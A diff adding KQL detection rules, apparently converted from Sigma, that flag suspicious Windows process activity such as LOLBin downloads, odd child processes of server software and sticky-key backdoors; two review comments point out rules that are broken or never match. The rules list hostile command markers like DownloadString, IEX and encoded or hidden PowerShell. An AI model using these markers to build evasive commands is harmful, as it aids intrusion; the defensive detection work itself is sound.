+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config" or ProcessCommandLine contains "/config" or ProcessCommandLine contains "–config" or ProcessCommandLine contains "—config" or ProcessCommandLine contains "―config") and (ProcessCommandLine contains "-Post" or ProcessCommandLine contains "/Post" or ProcessCommandLine contains "–Post" or ProcessCommandLine contains "—Post" or ProcessCommandLine contains "―Post") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certreq.exe" or ProcessVersionInfoOriginalFileName =~ "CertReq.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql b/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql
new file mode 100644
index 00000000..1d313013
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_created_as_system.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Created as System
+// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
+// Date: 2019-10-26
+// Level: high
+// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql
new file mode 100644
index 00000000..508b59e7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_aspnetcompiler.kql
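Review bot: The `where` clause of suspicious_child_process_created_as_system.kql contains six `... AccountDomain startswith ""` predicates that are always true, so the domain half of every account match contributes nothing, while the `AUTHORI`/`AUTORI` substring checks are applied to AccountName and InitiatingProcessAccountName. In DeviceProcessEvents the authority part of an account normally lives in the *AccountDomain columns, so `AccountName contains "AUTHORI"` combined with `AccountName =~ "SYSTEM"` in the same conjunction likely never matches and the rule is effectively dead. This looks like the converter splitting a single Sigma `DOMAIN\user` field into name and domain without carrying the substring over; the domain should carry it instead, e.g. `(AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI")` and the mirror for InitiatingProcessAccountDomain, with the empty `startswith` terms removed. As this file is regenerated by the workflow, the fix belongs in helper.py's user-field mapping rather than in the generated .kql.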
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process of AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: high
+// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql
new file mode 100644
index 00000000..1e46d243
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_bginfo_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-16
+// Level: high
+// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql
new file mode 100644
index 00000000..56caf330
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_manage_engine_servicedesk.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Child Process Of Manage Engine ServiceDesk
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-01-18
+// Level: high
+// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+// - Legitimate sub processes started by Manage Engine ServiceDesk Pro
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath contains "\\ManageEngine\\ServiceDesk\\" and InitiatingProcessFolderPath contains "\\java.exe")) and (not((ProcessCommandLine contains " stop" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql
new file mode 100644
index 00000000..2ba63c98
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_sql_server.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of SQL Server
+// Author: FPT.EagleEye Team, wagga
+// Date: 2020-12-11
+// Level: high
+// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1505.003, attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql
new file mode 100644
index 00000000..fb29b870
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_veeam_dabatase.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of Veeam Dabatase
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: critical
+// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql
new file mode 100644
index 00000000..ef291be5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_child_process_of_wermgr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Child Process Of Wermgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-14
+// Level: high
+// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe") and (not(((ProcessCommandLine contains "-queuereporting" or ProcessCommandLine contains "-responsepester") and (ProcessCommandLine contains "C:\\Windows\\system32\\WerConCpl.dll" and ProcessCommandLine contains "LaunchErcApp ") and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
new file mode 100644
index 00000000..b280e656
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_chromium_browser_instance_executed_with_custom_extension.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: high
+// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql
new file mode 100644
index 00000000..16d162b2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious ClickFix/FileFix Execution Pattern
+// Author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-19
+// Level: high
+// Description: Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).
+// Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.001, attack.t1204.004
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "account" or ProcessCommandLine contains "anti-bot" or ProcessCommandLine contains "botcheck" or ProcessCommandLine contains "captcha" or ProcessCommandLine contains "challenge" or ProcessCommandLine contains "confirmation" or ProcessCommandLine contains "fraud" or ProcessCommandLine contains "human" or ProcessCommandLine contains "identification" or ProcessCommandLine contains "identificator" or ProcessCommandLine contains "identity" or ProcessCommandLine contains "robot" or ProcessCommandLine contains "validation" or ProcessCommandLine contains "verification" or ProcessCommandLine contains "verify") and (ProcessCommandLine contains "#" and InitiatingProcessFolderPath endswith "\\explorer.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql
new file mode 100644
index 00000000..e60204e9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_codepage_switch_via_chcp.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious CodePage Switch Via CHCP
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-10-14
+// Level: medium
+// Description: Detects a code page switch in command line or batch scripts to a rare language
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036, attack.defense-evasion
+// False Positives:
+// - Administrative activity (adjust code pages according to your organization's region)
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql
new file mode 100644
index 00000000..6eb95c3d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_command_patterns_in_scheduled_task_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Command Patterns In Scheduled Task Creation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: high
+// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%")
and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql b/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql
new file mode 100644
index 00000000..c924af0d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_control_panel_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Control Panel DLL Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-04-15
+// Level: high
+// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql
new file mode 100644
index 00000000..bca8698f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_copy_from_or_to_system_directory.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Copy From or To System Directory
+// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-07-03
+// Level: medium
+// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
+// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+// - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)
+// - When cmd.exe and xcopy.exe are called directly
+// - When the command contains the keywords but not in the correct order
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ProcessCommandLine matches regex "(?i)\\s['"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)" and (not(((ProcessCommandLine contains "C:\\Program Files\\Avira\\" or ProcessCommandLine contains "C:\\Program Files (x86)\\Avira\\") and (ProcessCommandLine contains "/c copy" and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "\\avira_system_speedup.exe") and FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
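Review bot: The `matches regex` literal on the `| where` line is not a valid KQL string: the character class `['"]` contains an unescaped double quote, which terminates the `"..."` literal and leaves the rest of the pattern as stray tokens, so the query fails to parse and this rule never fires. Escape it as `['\"]`, giving `ProcessCommandLine matches regex "(?i)\\s['\"]?C:\\\\Windows\\\\(System32|SysWOW64|WinSxS)"` (KQL accepts `\"` inside double-quoted strings). The header layout suggests these files are converter output, so the fix presumably belongs in the converter's quoting of regex values rather than in this file, otherwise it is overwritten on the next regeneration, and any other Sigma regex containing a double quote would have the same problem.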
diff --git a/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql b/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql
new file mode 100644
index 00000000..5bc3c6eb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_csi_exe_usage.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Csi.exe Usage
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1072, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage by software developers
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql b/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql
new file mode 100644
index 00000000..de61ac2f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_curl_exe_download.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Curl.EXE Download
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and ((ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs") or (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\PerfLogs\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")) and (not(((ProcessCommandLine contains "--silent --show-error --output " and ProcessCommandLine contains "gfw-httpget-" and ProcessCommandLine contains "AppData") and FolderPath =~ "C:\\Program Files\\Git\\mingw64\\bin\\curl.exe" and InitiatingProcessFolderPath =~ "C:\\Program Files\\Git\\usr\\bin\\sh.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql b/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql
new file mode 100644
index 00000000..840e5a62
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_customshellhost_execution.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious CustomShellHost Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: high
+// Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - False positives are unlikely, investigate matches carefully.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql
new file mode 100644
index 00000000..4082a334
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_debugger_registration_cmdline.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Debugger Registration Cmdline
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-09-06
+// Level: high
+// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.008
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql b/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql
new file mode 100644
index 00000000..c8977ed0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_desktopimgdownldr_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Desktopimgdownldr Command
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /lockscreenurl:" and (not((ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".png")))) or (ProcessCommandLine contains "reg delete" and ProcessCommandLine contains "\\PersonalizationCSP")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql b/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql
new file mode 100644
index 00000000..072f8a0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_diantz_alternate_data_stream_execution.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Diantz Alternate Data Stream Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Very Possible
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql
new file mode 100644
index 00000000..a5e27b99
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_diantz_download_and_compress_into_a_cab_file.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Diantz Download and Compress Into a CAB File
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download and compress a remote file and store it in a cab file on local machine.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains " \\\\" and ProcessCommandLine contains ".cab"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql
new file mode 100644
index 00000000..e06d1d9a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_dll_loaded_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious DLL Loaded via CertOC.EXE
